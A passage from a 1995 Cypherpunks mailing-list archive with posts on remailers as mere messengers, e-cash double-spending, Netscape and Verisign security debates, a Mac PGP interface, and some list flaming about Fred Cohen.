editor's responsibility not to "relay" libelous material, and so forth, but
these are not cases of mere couriers or messengers.

(Counterpoint: And yet couriers who knowingly transport drugs of course
face sanctions. This is a case where the possession (and hence transport)
itself is illegal. This involves scienter--awareness--of what is being
transported, in a way that delivery of an encrypted message clearly could
not. Or even unencrypted messages, if the messenger could make a plausible
claim that he does not look at or screen messages. Lots of issues to
discuss.)


A MAIL DELIVERY SERVICE (don't we already have them? yes, but....)

So, how would this work?

With remailers, even more steps need to be taken to make it absolutely
clear that the delivered message is not _from_ the last Internet site that
shows up in the "From:" field. More than just disclaimers are needed.

One approach is for a _notification-based_ system. To wit:

"You have a piece of mail awaiting at our mail delivery service. The
originator is unknown. The title of the message is "Tentacles of Medusa
Must Die!" You may retrieve this message by replying to this notification
with the word "Yes" anywhere in the Subject field. This message will be
kept for 60 days and then deleted."

The idea being to more carefully distinguish between mere messengers and
the "From:" field (not that "From:" establishes origin, as we all know from
the whole point of remailers, but most people associate "From:" with an
actual originator, wherein lies the problem).

It would also lessen complaints from people who suddenly find unwanted mail
arriving anonymously. People would have to make at least some token effort
to "accept delivery."

Similarities to "general delivery" mail delivery are obvious, as are
similarities to fee-based mail forwarding services and "Mailboxes Etc."
services.

(By the way, and not to digress again, but I see systems like this as the
likely future of mail. Some scheme where a user chooses to accept or reject
delivery--as with packages delivered which one can refuse delivery on--is
needed to solve several problems: mailbombs, unwanted illegal material
arriving, the sheer flood of mail, etc. And with people moving around,
changing companies, wanting anonymity, etc., such mail service sites will
be a natural fit. Having them add filtering services, a la MailWeir, is one
obvious service.)

This could be implemented as a new type of remailer. This could also
integrate with paid delivery systems, a la digital postage. (I can imagine
some people demanding to be paid some small amount to receive a
message....this is not feasible with the current "free delivery" model, but
a lot of things are not possible with "free delivery." But I digress.)

I'll quit for now. Lots of issues.

"Don't kill the messenger."


--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 19 Oct 95 21:16:20 PDT
To: cypherpunks@toad.com
Subject: ANSI to work on e-payment -- first meeting coming up
Message-ID: <9510200413.AA17440@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain



First Meeting of Electronic Commerce Work Group
November 29, Washington, DC

ANSI Accredited Standards Committee X9 - Financial Services - in 
response to the explosion of payment transaction proposals for the 
internet, has approved a new work item to develop a single secure 
electronic payment syntax.  The first meeting of the Electronic Commerce 
Work Group will be Wednesday, November 29 from 9:00am till 5:00pm at the 
American Bankers Association, 1120 Connecticut Ave, NW, Washington, DC 
20036.

Agenda

Review of Scope of Work
Consideration of Federal Reserve Request to expand scope to Bank-Bank 
messages
Presentation from Industry groups with existing payment protocols
Assignment of work items
New items
Next meetings  (Jan/Feb. - San Francisco, May - Boston??)

A draft scope:

The payment syntax described in this standard is designed to order a 
financial institution to make payment to a merchant from an account of a 
purchaser based on the near term delivery of low monetary value goods or 
services.  It will be possible to include this payment order in any 
electronic protocol that is based on communications between the 
purchaser and the merchant, and between the merchant and a financial 
institution.  This standard does not describe, nor recommend, any 
particular communications protocol.

When used within a complete payment infrastructure, the secure payment 
order described shall offer privacy and integrity of the purchaser's 
payment information, and shall prevent the purchaser from successfully 
repudiating the sending, or the merchant from successfully repudiating 
the receiving, of a valid payment order.  Thus the financial institution 
can be sure that its customer requested the payment and that the 
merchant can be accurately identified on the account statement.

About ASC X9

ASC X9 is the accredited standards developer which brings together 
banks, securities trading companies, equipment and software 
manufactures, associations and others in the financial services industry 
to develop voluntary nationally accepted standards based on industry 
consensus.  Founded in 1976, ASC X9 was accredited by the American 
National Standards institute in 1984.  The American Bankers Association 
serves as X9 Secretariat.  For more information on X9, contact the 
secretariat at 202/663-5300, for more information on the Electronic 
Commerce Work Group, contact its chair, Tom Jones at 602/554-3569.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: djw@pdcorp.com (Dan Weinstein)
Date: Thu, 19 Oct 95 22:20:20 PDT
To: anonymous-remailer@shell.portal.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <199510200517.WAA15755@email.pdcorp.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 19 Oct 1995 10:22:40 -0700, Alice de 'nonymous wrote:


>>From the "Orange Book", one of the volumes of the Department of Defence's
>"Rainbow Series" more commonly known as TCSEC (Trusted Computer System
>Evaluation Criteria) and available from: 
>
> U.S. Government Printing Office         INFOSEC Awareness Office
> Superintendent of Documents     - or -  National Computer Security Centre
> Washington, DC 20402	                 9800 Savage Road	
>                                         Fort George G. Meade, MD  20755-6000
>
>which stipulates that:
>
>      "... it is required that ADP (Automated Data Processing) systems
>       that "process, store, or use classified data and produce 
>       classified information will, with reasonable dependability, prevent:
>
>        a. Deliberate or inadvertent access to classified material by
>           unauthorized persons, and
>
>        b. Unauthorized manipulation of the computer and its associated 
>           peripheral devices."
>

I used to work in ADP security for the U.S. navy and can tell you that
at least the Navy's requirements also include the machine's physical
security and the networks that these machines may be connected to.  In
fact I believe that Secret information can only be stored on a machine
in vault or on removable media.  These are not things that the average
individual is going to do with there computer.  Netscape only attempts
to secure the information being transferred from a trusted client and
a trusted server.  I have yet to see Netscape claiming that if you
install their software on your machine that you will never again
suffer from data loss.  Your expectations are ridicules, Netscape
cannot be held responsible for the end user not properly configuring
their machine.  Please stop wasting everyone's time with your
ridicules rants.  If you must continue to post your idiocy stop using
an anonymous remailer so that the rest of us who want to use this
mailing list for intelligent discussion can kill file you.



Dan Weinstein
djw@pdcorp.com
http://www.earthlink.net/~danjw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 20 Oct 95 05:32:01 PDT
To: cypherpunks@toad.com
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <DGpCsv.9r5@sgi.sgi.com>
Message-ID: <199510201231.FAA15050@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGpCsv.9r5@sgi.sgi.com>, fc@all.net (Dr. Frederick B. Cohen) writes:

> And how secure is the hash? It it possible to create values that will
> hash to each prime (or something else that does the job)? Is the hash
> something we can figure a way to precompute using massively parallel
> processing so that we can then provide a set of codes which will produce
> the desired results? (etc.)

Perhaps you should consider learning something about cryptography before
you cast aspersions on someone else's cryptographic protocols.

To date, MD5 appears to be a secure hash.  If you manage to find a way
to reverse it, please let us all know.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 20 Oct 95 05:50:20 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <DGq01x.ADx@sgi.sgi.com>
Message-ID: <199510201250.FAA15055@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGq01x.ADx@sgi.sgi.com>, Aleph One <aleph1@dfw.net> writes:
> On Thu, 19 Oct 1995 anonymous-remailer@shell.portal.com wrote:

>> >   NETSCAPE CLIENT APIS (NCAPIS) 2.0

>> Generally, we don't routinely trust every other computer, foreign or 
>> domestic on the Internet to manipulate us by remote control.  This is
>> as basic as the idea that we don't give out our PIN numbers with our 
>> banking cards to anyone who asks us.  

> Have you actually read the stuff? The NCAPIS is not on by default.
> You *must* enable it by tellling it to which port to listen on.
> Further more Mosaic had a remote control API before Netscape did.

They can also be used only from the local machine on Windows or from any
machine your X server trusts on Unix.  Unless the attacker can control
what software is installed on the target system, there's no way for him
to use this to his advantage.  Of course, there's always the possibility
of exploting bugs, but that's not a "flawed algorithm".

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Thu, 19 Oct 95 23:10:53 PDT
To: cypherpunks@toad.com
Subject: old doc cohen
Message-ID: <9510200559.AA12325@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


<<this post was written by me and two other people who have been watching
cohen's career for the last few years. i'n sorry for the spelling mistakes
and typos.>>

dr frederick b. cohen's frequent rants in which he expresses nothing
but contempt for everyone else in the security and crypt business
have to be understood in their context:

	he's trying to sell something.

what's he selling? who's he trying to sell it to? there are several answers.
all are partly true and taken together explain his posts pretty well.

	directly, he's trying to get us to buy his products, services,
	and books, or at least recommend them to others. it is obvious
	how setting himself up as the only one who recognizes these
	serious flaws would enhance his consulting business. he doesn't
	care about netscape or pgp. he cares about his wallet.

	indirectly, he's testing out halfbaked ideas here to better
	learn how to refute those who see through their weaknesses so that
	he'll be better prepared when he spews in more "serious" forums.
	this is a low risk place, as far as he's concerned, to make
	a fool of himself.

	socially, he's selling the idea of his own academic
	respectability. notice how he reminds us he's "dr." (look at me!
	i have a doctorate!!!) cohen. the truth is he never managed to
	get the respect of the mainstream academic and research worlds.
	he's been reduced to playing the role of victim-soothsayer. we'll all
	regret not listening to him back when we had the chance, one of these
	days. look at the reaction to his "seminal work" on viruses for
	a great example of how the real research world yawns at him to
	understand why this is so important to him. he feels cheated out
	of the respect he deserves. (he's willing not to care about his
	wallet to the extent that he gets this)

	psychologically, he's selling the idea that he's respectable to
	himself. ultimately it doesn't matter that most of us see right
	through him as long as he gets enough people listening to him to
	feed his very delicate ego. he needs us (someone, anyone,
	even us cypherpunks if that's what it takes) to love him and
	take him seriously.  it's very sad.

let's just ignore him. he'll find somewhere else to play (he always does).
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 20 Oct 95 07:05:01 PDT
To: cypherpunks@toad.com
Subject: Re: Polymorphic e-cash schemes was: digital cash and identity disclosure
In-Reply-To: <199510192001.OAA25866@nag.cs.colorado.edu>
Message-ID: <199510201403.HAA24730@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Bryce <wilcoxb@nag.cs.colorado.edu> writes:

>Perhaps a similar "polymorphism" could be implemented with regard to
>on-line/off-line clearing.  When you as a payee receive a Chaumian
>Ecash coin, you can choose based on several factors (including
>reputation of the payer if he chooses to make his nym known to you,
>size of the transaction, time of day, or whatever) to either accept it
>immediately and credit the payer with whatever it is you are selling,
>or to delay completion of the transaction while you attempt to deposit
>the coin with your e-bank.  (If you are wary of "payee-ID proof
>stings" like Lucky Green is, then you can go ahead and launder your
>coin through an anon account during this interval...)  If your payer
>has already spent this coin, then the bank will inform you immediately
>and you can cancel the transaction.  (And take whatever other actions
>you consider appropriate...)

Unfortunately, in order for a coin to be POTENTIALLY spent in an off-line
way, the protocols require that the identity of the withdrawer be
embedded, in blinded form, within the coin data.  It is this step that
Tim and others object to, because among other things it requires
participants to securely identify themselves to the bank, hence does not
work well in a fully anonymous society.  The reason for this requirement
is that if the coin is double-spent, this is not found out until
afterwards, and so the identity of the cheater has to be available so the
bank can go after him.

So letting the payee choose whether to deposit the coin right away or
wait until later will not address this basic privacy problem with offline
cash.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Fri, 20 Oct 95 04:41:27 PDT
To: cypherpunks@toad.com
Subject: PGP interface for Mac--well...
Message-ID: <v02120d01acad01856cab@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Has anyone seen this yet? The only upload I've seen, on info-Mac,
unbinhexes into something called "My Preschool Demo," and that's pretty
much what it is.

http://hyperarchive.lcs.mit.edu/HyperArchive/Archive/cmp/
                mac-pgp-control-10b1-as.hqx


From ~/mac-pgp-control-10b1-as.hqx.abs

>Abstract of INFO-MAC archived encoded Mac binary file
>   'cmp/mac-pgp-control-10b1-as.hqx'
>  Uploaded 10/20/95   250028 bytes
>
>From: raif@mpx.com.au ( Raf S. Naffah)
>Subject: MacPGP Control 1.0 Beta 1
>
>Hi there,
>
>Please find attached the first public release (Beta 1) of the MacPGP
>Control application.
>
>MacPGP Control (or MPGPC for short) is an AppleScript application --written
>in AppleScript English dialect and FaceSpan 2.0.1-- that offers an
>easy-to-use, more Macintosh friendly user interface to MacPGP.
>
>The main features of MPGPC are:
>
>1. [Mac]PGP related features:
>* Allows definition and use of nicknames for Users and Groups recepients.
>* Offers more control for keyring related actions, through a true Macintosh
>Human Interface and -in some cases- direct manipulation of keyring file
>data, including: editing trust flag byte, enabling/disabling, extracting,
>checking, certifying, fingerprinting, and forcing Warn-Only bits.
>* Secure clean clear-signed PGP ciphers, through the implementation of
>features such as: expanding tabs, transliterating non-USASCII characters,
>and word-wrapping lines before processing and handing over to email
>application.
>* Allows viewing of PGP packets for educational and debugging purposes.
>* Allows opaque signing (asciified clear-signed text)
>* Supports (low-level) and use HTTP for PGP Keyserver querry and update of
>public key information.
>* Transparent use of user's UserIDs found in his/her secret keyring file.
>* Allows encryption for multiple recepients.
>* Generates Key Revocation Certificates.
>
>2. Eudora related features:
>* Supports latest Eudora versions (2.1.3/1.5.3) known to break certain scripts.
>* User-configurable Auto Move PGP messages to designated mailbox.
>* User-configurable Auto Decrypt source data before processing.
>
>3. Macintosh related features:
>* Handles encrypting/decrypting messages larger than 32K internally, while
>allowing editing of the top/first 32K chunck.
>* Extensive support of drag-and-drop.
>* Documented handlers calls for use by other scripters.
>
>To run MPGPC you need:
>
>1. The Scriptable Finder,
>2. Geneva font family,
>3. MacPGP (tested with the 2.6ui and 2.6.2 versions),
>4. The following additional extensions should be in the Extensions folder
>inside the System Folder:
>   * AppleScript,
>   * FaceSpan Extension v2.0.1, which lives on
>   <ftp://199.72.251.93//pub/sdu/FaceSpan/FaceSpanext20.sea.hqx>
>5. The following osaxen which should be part of the standard distribution
>of the Scriptable Finder, and which should reside in the Scripting
>Additions folder inside the Extensions folder:
>   * Choose File,
>   * Display Dialog,
>   * File Commands,
>   * Load Script,
>   * New File,
>   * Numerics,
>   * programmer's tool,
>   * Read/Write Commands,
>   * Store Script,
>   * String Commands.
>
>MPGPC is a freeware.
>
>cheers;






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Fri, 20 Oct 95 07:55:08 PDT
To: cypherpunks@toad.com
Subject: Re: Don't Kill the Messenger--A New Slant on Remailers
In-Reply-To: <acac7cd8430210046e54@[205.199.118.202]>
Message-ID: <199510201453.HAA06104@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


To add some background, here are two recent complaints which I received.
They give some of the flavor of what people object to:

> Please do not allow any more anonymous postings from your site to the
> Technical Writer's list.  I don't see any reason we should waste time on
> messages from people we cannot respond to.  One of the rules of the list is
> that MOST discussions are conducted "offline," with the list strictly
> reserved for topics of Technical Writers' interest.  Anonymous postings do
> not allow this to proceed.
> 
> I am angered when I see the message "THE PORTAL SYSTEM DOES NOT CONDONE OR
> APPROVE OF THE CONTENTS OF THIS POSTING."  I think this is irresponsible
> net behavior.  It is liable to cause you service trouble when your site is
> inevitably spammed by angry EMailers and newsgroup readers from all over
> the world.


> Dear Sir,
> 
> I recently received some mail through "anonymous-remailer@shell.portal.com" 
> from a sick person that probably has (had) problems with the way I behave, 
> and says he (or she?) means that my live has to be terminated. I do NOT 
> approve of these kind of messages, and I also do not approve of your service 
> to make these kinds of threads possible. I demand that you take action to 
> trace and stop these massages, and I will make it my business to have these 
> kinds of services banned from the Internet.
> 
> yours sincerely,
> <...>

These messages show that most people are unfamiliar with the notion of
anonymous remailers.  Their first exposure to the idea is when they get
some objectionable anonymous mail.  So to the extent that the problem is
to be solved by education, we would have a very long row to hoe.

Fortunately, the vast majority of such complaints can be dealt with by
blocking the addresses of the people complaining from receiving future
anonymous mail.  This almost always satisfies people.

The idea of making people ask to receive anonymous mail is interesting.
It would not seem to apply to newsgroups and/or mailing lists, but for
individuals it might work.  The remailer would have to be able to
distinguish between "end users" and other remailers in order to know
whether it was just one step in a chain or the last step.  (We can't
depend on the sender to tell us that since it is abusive or harrassing
mail which will cause the problems, and senders of such mail would
presumably have incentive to get it delivered.)

It would require somewhat greater resources on the part of the remailer
to hold the messages.  I would guess from experience that a large
fraction of the messages would never be picked up, although my
perceptions may be biased since I only see bounced, poorly formatted, or
complained-about mail, and these categories probably have a larger
fraction of messages from clueless and obnoxious people.  But certainly
the messed-up messages I do see are mostly flames, "guess who's", and
similar worthless junk.  I hope there are some pearls going through that
I never see, but that is just a matter of faith.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Fri, 20 Oct 95 07:32:10 PDT
To: cypherpunks@toad.com
Subject: Denver area meeting, SUNDAY, 10/22, 2 pm
Message-ID: <n86hwkkAsycD085yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

As usual, we'll congregate in the food court in the basement of the
Tivoli, and probably wander to a nearby restaurant when we have a
quorum.  I'll try to remember to bring my newly acquired copy of
_SOLVING CIPHER PROBLEMS, Cryptanalysis, Probabilities, and Diagnostics_,
by Frank W. Lewis, for perusal by anyone interested in classical
cryptanalysis.  Email for directions, additional info, etc.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMIexV1RRFMq4NZY5AQFk0gP/YJpNdaD9LP0/u+fkkGHV1DdQ2X0Zxb/U
263M6fn3aoe0voEjfgH791SeHuhbQcuK30SaeVbn59tZDbbMmiZi9qFp5wUwFxVZ
c27pkR9cCs0jKwPSuuofMWqKCMuWjuQdHRFtpAUSSq0QG8VUCnKh7Imda2TXGI4D
t0pRiz2JGe4=
=X3HL
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 20 Oct 95 08:45:50 PDT
To: cypherpunks@toad.com
Subject: Verisign and MITM
Message-ID: <199510201540.IAA11523@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


	I recently submitted a certificate request to Verisign for my
SSL web server. Looking over the process, I don't see how it avoids
MITM in any way.

The process:

A) I send to netscape-cert@versign.com the email address and phone
number of my webmaster (me) along with the cert request, generated
using SSLeay's 'req' utility.

B) I fax to Verisign a request letter saying "I have a right to use
the name Commmunity ConneXion, etc." and proof of right to use
name. (Berkeley biz liscense and Alameda Cty. fictitious bizname
statement, in my case.)

C) I snail mail them the same thing.


	I don't see any mechanism in place to avoid an MITM subverting
step (A), and putting in his cert request in there. There isn't a
strong cryptographic unforgeable relationship between my
usmail/fax/proof request and the emailed kx509 cert request.


-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:	 510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")			sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 20 Oct 95 09:01:11 PDT
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: Postscript in Netscape
Message-ID: <199510201600.JAA02009@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 07:56 AM 10/18/95 -0400, Dr. Frederick B. Cohen wrote:
> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:

Warning:  This bullet proof vest will not protect you if you take it
off and stand in front of a gun.

If you download a virus infested executable using netscape and 
execute it, what do you expect?

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Fri, 20 Oct 95 08:55:50 PDT
To: mhw@wittsend.com
Subject: Re: Postscript and 50 ways [MAJOR NOISE] [long]
Message-ID: <9510201551.AA15270@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain



I too had to put up with Dr. Fred on the firewalls list.  I don't see what
you hoped to accomplish by posting this off-topic mean spirited stuff to
cypherpunks though.  There are many others here that are also on firewalls,
and we've let Dr. Fred speak for himself.  Everyone has already formed the
opinions they'll likely have, and it seems the only purpose of your tirade
is to mean-spiritedly kick a man when he's down.  It doesn't reflect well
on you, it wastes our time, and is a bit sickening.  Were you one of the
people making the geek dance in high school too?  I really wish you'd 
apologise to the list for this crap.  We're here to discuss cypercoolness,
not flame people, (whether they might seem to invite it or not).  Lately
this list has turned into a flame the geek list.  It's not quite the fun 
it once was, and it's embarassing to watch.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Fri, 20 Oct 95 08:53:41 PDT
To: cypherpunks@toad.com
Subject: Re: digital cash and identity disclosure
In-Reply-To: <DGqtsp.1L@sgi.sgi.com>
Message-ID: <199510201553.IAA15162@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGqtsp.1L@sgi.sgi.com>, Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif ) writes:

> Scott Brickner writes:
>> Andreas Bogk writes:
>>> But as far as I got Chaums idea, Alice would not reveal Bobs identity,
>>> but rather her own. Am I missing a point here?
>> 
>> You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
>> without depositing it in the bank and getting new money issued.  Each
>> coin has "This money was issued to Alice" as an invisible imprint which
>> only shows up when two coins with the same serial number are together.

> I don't understand how this could happen? The two coins are identical
> (as I understood it from the tech backgound of ecash). what has a double-
> spended coin what a copied single-spended coin not has?

> Forgive if I missed relevant postings to this subject since I only read
> parts from the list offline.

The process of spending a coin is not simply that of transfering data.
There is a complicated protocol in which Alice decrypts some of the
identity information in the coin.  Let's say that Alice spends the coin
twice, once with Bob and again with Chuck.  Bob and Chuck can pool the
information they got from Alice and reconstruct her identity.  Alice
can't just give them both the same information because the receiver is
the one who determines what information is decrypted.  For a more
detailed explanation, check out Schneier's book.

-- 
Sure we spend a lot of money, but that doesn't mean | Tom Weinstein
we *do* anything.  --  Washington DC motto          | tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 20 Oct 95 06:10:34 PDT
To: cypherpunks@toad.com
Subject: Dr. Fred
Message-ID: <v02120d00acad4ea0664f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


While Dr. Fred may have a (diminishing) few defenders left on this list, I
have found that <Plonk!>ing him was useful, at least until his latest
series of trolls stirred up the unaware.

I agree with the people who say that if he's ignored, he'll go away. After
all, it has worked before, yes?

Prove to me it won't work. ;-).

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 19 Oct 95 21:06:01 PDT
To: dwa@corsair.com (Dana W. Albrecht)
Subject: Re: airport security
In-Reply-To: <199510191930.MAA28188@elmos.corsair.com>
Message-ID: <199510192305.AA20608@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>I've flown twice since then (on SouthWest), without being asked for any
>identification.

In Australia security is quite lax. I regularly travel under assumed names on
planes, trains and buses. You can pay with cash and be completely anonymous.
The only time it has been noticed by anyone was when a friend asked who the
"John Smith" was on my ticket. No company has worried about it.

I figure if I die and burn in a crash then what do I care if they can ID me or
not. There are worst things in life than being buried as John Doe. Those with
religious beliefs may take issue with that. But then, is a True Name your
birth name, your christened name, your legal name or your magick name.
Let "god" sort it out.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: amp <Alan.Pugh@internetMCI.COM>
Date: Fri, 20 Oct 95 07:19:00 PDT
To: John McGough <cypherpunks@toad.com>
Subject: Re: 1(800)MY-ANI-IS
Message-ID: <01HWNRFIK5LE90NDZC@MAIL-CLUSTER.PCY.MCI.NET>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Date: Friday, 20-Oct-95 07:58 AM

From: John McGough             \ Internet:    
(john.mcgough@mail.industry.net)
To:   amp                      \ Internet:    (alan.pugh@internetmci.com)

Subject: 1(800)MY-ANI-IS

JM> Looks like MCI is looking for a authorization code during that
JM> tone.  Do you have any idea how many digits is standard on their
JM> stuff?   Or better yet, if you figure it out, please let me know. 
JM> I'll do the same.
 
while i wouldn't be at liberty to get you a valid code, (i'm not sure
of the number of digits it wants as i haven't gotten mine yet), i
would suggest you call one of mci's customer service centers and
_politely_ request that they allow access to this service to non-mci
employees. i would suggest that they put some kind of message on the
number before they give you the ani like "this service provided by
mci." i would see this as a good public relations tactic for the
company for telecom-type folx who would be using it.

my 2 cents.

unfortunately, i don't speak for my company.

amp
<0003701548@mcimail.com>
<alan.pugh@internetmci.com>
PGP Key = 4A2683C1
PGP FP = A7 97 70 0F E2 5B 95 7C DB 7C 2B BF 0F E1 69 1D
October 20, 1995   10:11

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMIeuJCgP1O9KJoPBAQEEqAf8DAWR7BJ3SmuPNlXLpgdSmx/lPHFEQlU0
y71SR2D9h5S8cVlhWxpG/vPutCOVRwriLZD4/CP0AwOftm6LuqXY1O6o8B4us8OC
BeqAvm5iQRDZ1xyPHofT0vjxytUp40SQ08mvYsCYxDTFZIvlgx8dk4O/Pt8Kt0Ka
kDzkKHG3t/cJbr5oDjPtLNqUz4GrQY75qemxb1j/GvwEauC5+/pDaaqrzuQiwgB3
sMqBiyCqNflL/IxhKvxA5gKBXAzQoUuX7JZm5E52gWKPHEmx1OuceTPxYupcqmnv
6s2pBpXrE8WvpKAyrFkBxhv0EUhdu2FqSOns4VMPAqk8lHlAsxTh3w==
=D7Uw
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Holger.Reif@PrakInf.TU-Ilmenau.DE (Holger Reif )
Date: Fri, 20 Oct 95 02:34:18 PDT
To: wilcoxb@nag.cs.colorado.edu
Subject: Re: digital cash and identity disclosure
Message-ID: <9510200933.AA02681@PrakInf.TU-Ilmenau.DE>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner writes:
>Andreas Bogk writes:
>>But as far as I got Chaums idea, Alice would not reveal Bobs identity,
>>but rather her own. Am I missing a point here?
>
>You're right.  Tim's wrong.  Bob can't spend the money Alice gave him
>without depositing it in the bank and getting new money issued.  Each
>coin has "This money was issued to Alice" as an invisible imprint which
>only shows up when two coins with the same serial number are together.

I don't understand how this could happen? The two coins are identical
(as I understood it from the tech backgound of ecash). what has a double-
spended coin what a copied single-spended coin not has?

Forgive if I missed relevant postings to this subject since I only read
parts from the list offline.


read you later  -  Holger Reif
http://remus.prakinf.tu-ilmenau.de/Reif/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Fri, 20 Oct 95 03:13:54 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [META-NOISE] W3
In-Reply-To: <199510191722.KAA06757@jobe.shell.portal.com>
Message-ID: <9510201011.AA04958@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


Futplex <futplex@pseudonym.com> write:
> Meta-noise, but I don't plan to lose any sleep over this....
> Maybe I'm just too sheltered. But in a couple of years on the Net, I've only
> ever seen _one person_ write "W3" as an abbreviation for World Wide Web
> before now.

I do use W3 too, though I'm not Alice I swear ;) !
(and I doubt i'm alone)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

AK-47 $400 million in gold SEAL Team 6 nuclear Clinton Pasqua
